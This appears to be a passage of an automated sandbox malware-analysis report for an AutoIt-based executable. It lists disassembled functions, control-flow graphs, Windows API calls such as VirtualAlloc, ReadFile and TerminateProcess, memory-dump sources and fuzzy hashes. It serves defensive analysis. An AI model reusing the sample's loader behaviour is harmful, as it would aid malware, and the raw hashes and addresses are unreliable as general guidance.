                                                                                                                                                    Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1237 40f5c0-40f5cf call 422240 1240 40f5d0-40f5e8 1237->1240 1240->1240 1241 40f5ea-40f613 call 413650 call 410e60 1240->1241 1246 40f614-40f633 call 414d04 1241->1246 1249 40f691 1246->1249 1250 40f635-40f63c 1246->1250 1251 40f696-40f69c 1249->1251 1252 40f660-40f674 call 4150d1 1250->1252 1253 40f63e 1250->1253 1257 40f679-40f67c 1252->1257 1254 40f640 1253->1254 1256 40f642-40f650 1254->1256 1258 40f652-40f655 1256->1258 1259 40f67e-40f68c 1256->1259 1257->1246 1262 40f65b-40f65e 1258->1262 1263 425d1e-425d3e call 4150d1 call 414d04 1258->1263 1260 40f68e-40f68f 1259->1260 1261 40f69f-40f6ad 1259->1261 1260->1258 1264 40f6b4-40f6c2 1261->1264 1265 40f6af-40f6b2 1261->1265 1262->1252 1262->1254 1273 425d43-425d5f call 414d30 1263->1273 1268 425d16 1264->1268 1269 40f6c8-40f6d6 1264->1269 1265->1258 1268->1263 1271 425d05-425d0b 1269->1271 1272 40f6dc-40f6df 1269->1272 1271->1256 1274 425d11 1271->1274 1272->1258 1273->1251 1274->1268
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                                                    • String ID: AU3!$EA06
                                                                                                                                                    • API String ID: 1268643489-2658333250
                                                                                                                                                    • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                                                    • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                                                                                    Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1277 401100-401111 1278 401113-401119 1277->1278 1279 401179-401180 1277->1279 1281 401144-40114a 1278->1281 1282 40111b-40111e 1278->1282 1279->1278 1280 401182 1279->1280 1283 40112c-401141 DefWindowProcW 1280->1283 1285 401184-40118e call 401250 1281->1285 1286 40114c-40114f 1281->1286 1282->1281 1284 401120-401126 1282->1284 1284->1283 1288 42b038-42b03f 1284->1288 1291 401193-40119a 1285->1291 1289 401151-401157 1286->1289 1290 40119d 1286->1290 1288->1283 1296 42b045-42b059 call 401000 call 40e0c0 1288->1296 1294 401219-40121f 1289->1294 1295 40115d 1289->1295 1292 4011a3-4011a9 1290->1292 1293 42afb4-42afc5 call 40f190 1290->1293 1292->1284 1298 4011af 1292->1298 1293->1291 1294->1284 1301 401225-42b06d call 468b0e 1294->1301 1299 401163-401166 1295->1299 1300 42b01d-42b024 1295->1300 1296->1283 1298->1284 1305 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1298->1305 1306 4011db-401202 SetTimer RegisterWindowMessageW 1298->1306 1308 42afe9-42b018 call 40f190 call 401a50 1299->1308 1309 40116c-401172 1299->1309 1300->1283 1307 42b02a-42b033 call 4370f4 1300->1307 1301->1291 1306->1291 1315 401204-401216 CreatePopupMenu 1306->1315 1307->1283 1308->1283 1309->1284 1317 401174-42afde call 45fd57 1309->1317 1317->1283 1328 42afe4 1317->1328 1328->1291
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                    • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                    • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                                                                    Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1329 4115d7-4115df 1330 4115ee-4115f9 call 4135bb 1329->1330 1333 4115e1-4115ec call 411988 1330->1333 1334 4115fb-4115fc 1330->1334 1333->1330 1337 4115fd-41160e 1333->1337 1338 411610-41163b call 417fc0 call 41130a 1337->1338 1339 41163c-411656 call 4180af call 418105 1337->1339 1338->1339
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 004115F1
                                                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                    • String ID: ,*H$4*H$@fI
                                                                                                                                                    • API String ID: 615853336-1459471987
                                                                                                                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                                                                                    Function 02F32610 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1348 2f32610-2f326be call 2f30000 1351 2f326c5-2f326eb call 2f33520 CreateFileW 1348->1351 1354 2f326f2-2f32702 1351->1354 1355 2f326ed 1351->1355 1363 2f32704 1354->1363 1364 2f32709-2f32723 VirtualAlloc 1354->1364 1356 2f3283d-2f32841 1355->1356 1357 2f32883-2f32886 1356->1357 1358 2f32843-2f32847 1356->1358 1360 2f32889-2f32890 1357->1360 1361 2f32853-2f32857 1358->1361 1362 2f32849-2f3284c 1358->1362 1365 2f32892-2f3289d 1360->1365 1366 2f328e5-2f328fa 1360->1366 1367 2f32867-2f3286b 1361->1367 1368 2f32859-2f32863 1361->1368 1362->1361 1363->1356 1369 2f32725 1364->1369 1370 2f3272a-2f32741 ReadFile 1364->1370 1371 2f328a1-2f328ad 1365->1371 1372 2f3289f 1365->1372 1373 2f3290a-2f32912 1366->1373 1374 2f328fc-2f32907 VirtualFree 1366->1374 1375 2f3287b 1367->1375 1376 2f3286d-2f32877 1367->1376 1368->1367 1369->1356 1377 2f32743 1370->1377 1378 2f32748-2f32788 VirtualAlloc 1370->1378 1381 2f328c1-2f328cd 1371->1381 1382 2f328af-2f328bf 1371->1382 1372->1366 1374->1373 1375->1357 1376->1375 1377->1356 1379 2f3278a 1378->1379 1380 2f3278f-2f327aa call 2f33770 1378->1380 1379->1356 1388 2f327b5-2f327bf 1380->1388 1385 2f328da-2f328e0 1381->1385 1386 2f328cf-2f328d8 1381->1386 1384 2f328e3 1382->1384 1384->1360 1385->1384 1386->1384 1389 2f327f2-2f32806 call 2f33580 1388->1389 1390 2f327c1-2f327f0 call 2f33770 1388->1390 1396 2f3280a-2f3280e 1389->1396 1397 2f32808 1389->1397 1390->1388 1398 2f32810-2f32814 CloseHandle 1396->1398 1399 2f3281a-2f3281e 1396->1399 1397->1356 1398->1399 1400 2f32820-2f3282b VirtualFree 1399->1400 1401 2f3282e-2f32837 1399->1401 1400->1401 1401->1351 1401->1356
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02F326E1
                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02F32907
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                                    • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                                    • Instruction ID: 9c5e02f828dadad807bf01ce1a14705925e7c01fa121adf7fc8b2852f7d58bf4
                                                                                                                                                    • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                                    • Instruction Fuzzy Hash: 33A1F575E00209EBDB15CFA4C894BEEBBB5BF48304F208159EA05BB280D7799E45CF94
                                                                                                                                                    Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1402 4102b0-4102c5 SHGetMalloc 1403 4102cb-4102da SHGetDesktopFolder 1402->1403 1404 425dfd-425e0e call 433244 1402->1404 1405 4102e0-41031a call 412fba 1403->1405 1406 41036b-410379 1403->1406 1414 410360-410368 1405->1414 1415 41031c-410331 SHGetPathFromIDListW 1405->1415 1406->1404 1412 41037f-410384 1406->1412 1414->1406 1416 410351-41035d 1415->1416 1417 410333-41034a call 412fba 1415->1417 1416->1414 1417->1416
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                    • API String ID: 3170942423-4011630074
                                                                                                                                                    • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                    • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                                    • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                    • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                                                    Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue$CloseOpen
                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                    • API String ID: 1586453840-614718249
                                                                                                                                                    • Opcode ID: b71d51f64b70c65a21aacfd12bd9f8cd1a00b42160e05dfef4e297133c897f40
                                                                                                                                                    • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                                                    • Opcode Fuzzy Hash: b71d51f64b70c65a21aacfd12bd9f8cd1a00b42160e05dfef4e297133c897f40
                                                                                                                                                    • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                                                    Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                    • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                    • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                                    • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                    • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                                                    Function 02F323B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02F322A0: Sleep.KERNELBASE(000001F4), ref: 02F322B1
                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02F324FE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                                    • String ID: SM4Z9FOQEF1ZZPDUEU2RMXUVU
                                                                                                                                                    • API String ID: 2694422964-3505261392
                                                                                                                                                    • Opcode ID: d5dda39f6aa291efd1d644d37283f649798babdcb4b4f800bf8a5c245906504b
                                                                                                                                                    • Instruction ID: b4b40032cbb9c462d3a5287e77461290016638c5549452988aa3480bb956fde1
                                                                                                                                                    • Opcode Fuzzy Hash: d5dda39f6aa291efd1d644d37283f649798babdcb4b4f800bf8a5c245906504b
                                                                                                                                                    • Instruction Fuzzy Hash: A2619F31D04288DAEF11DBA4C854BEFBB75AF19301F044198E658BB2C1D7BA1B49CB66
                                                                                                                                                    Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                                                    • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$OpenQueryValue
                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                    • API String ID: 1607946009-824357125
                                                                                                                                                    • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                    • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                                                    • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                    • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                                                    Function 00475077 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 390COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Wu
                                                                                                                                                    • API String ID: 0-4083010176
                                                                                                                                                    • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                    • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                    • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                    • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                    Function 00475300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
